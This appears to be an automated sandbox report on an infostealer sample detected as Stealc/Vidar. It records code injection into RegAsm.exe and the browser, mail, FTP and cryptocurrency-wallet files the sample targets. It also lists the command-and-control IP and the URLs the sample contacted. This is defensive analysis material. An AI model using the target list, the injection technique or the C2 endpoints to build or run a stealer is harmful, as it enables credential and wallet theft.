Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_00419600
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F96008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C32B341 cpuid 3_2_6C32B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 3_2_00417B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 3_2_00416920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 3_2_00417850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 3_2_00417A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.3595570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3595570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1819825998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1700536753.0000000003595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1820758252.000000000145A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe String found in binary or memory: passphrase.json
Source: RegAsm.exe String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe String found in binary or memory: \Ethereum\
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe, 00000003.00000002.1820758252.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonC+
Source: RegAsm.exe String found in binary or memory: Ethereum
Source: RegAsm.exe String found in binary or memory: file__0.localstorage
Source: RegAsm.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: RegAsm.exe, 00000003.00000002.1820758252.00000000014BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*Y
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000003.00000002.1820758252.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.3595570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3595570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1819825998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1700536753.0000000003595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1820758252.000000000145A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4E0C40 sqlite3_bind_zeroblob, 3_2_6C4E0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4E0D60 sqlite3_bind_parameter_name, 3_2_6C4E0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C408EA0 sqlite3_clear_bindings, 3_2_6C408EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4E0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 3_2_6C4E0B40
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520704 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 28 Suricata IDS alerts for network traffic 2->28 30 Found malware configuration 2->30 32 Yara detected Stealc 2->32 34 7 other signatures 2->34 6 file.exe 2 2->6         started        process3 signatures4 36 Contains functionality to inject code into remote processes 6->36 38 Writes to foreign memory regions 6->38 40 Allocates memory in foreign processes 6->40 42 Injects a PE file into a foreign processes 6->42 9 RegAsm.exe 33 6->9         started        14 RegAsm.exe 6->14         started        16 conhost.exe 6->16         started        process5 dnsIp6 26 194.87.29.53, 60865, 80 ASBAXETNRU Russian Federation 9->26 18 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 9->18 dropped 20 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->20 dropped 22 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->22 dropped 24 9 other files (none is malicious) 9->24 dropped 44 Tries to steal Mail credentials (via file / registry access) 9->44 46 Found many strings related to Crypto-Wallets (likely being stolen) 9->46 48 Tries to harvest and steal ftp login credentials 9->48 54 3 other signatures 9->54 50 Found evasive API chain (may stop execution after checking locale) 14->50 52 Searches for specific processes (likely to inject) 14->52 file7 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.87.29.53
 unknown Russian Federation
49392 ASBAXETNRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://194.87.29.53/97f9710b31d15029/mozglue.dll true
    		unknown
    http://194.87.29.53/97f9710b31d15029/nss3.dll true
      		unknown
      http://194.87.29.53/6f9307efa625dd18.php true
        		unknown
        http://194.87.29.53/97f9710b31d15029/vcruntime140.dll true
          		unknown
          http://194.87.29.53/ true
            		unknown
            http://194.87.29.53/97f9710b31d15029/sqlite3.dll true
              		unknown
              http://194.87.29.53/97f9710b31d15029/msvcp140.dll true
                		unknown
                http://194.87.29.53/97f9710b31d15029/freebl3.dll true
                  		unknown
                  http://194.87.29.53/97f9710b31d15029/softokn3.dll true
                    		unknown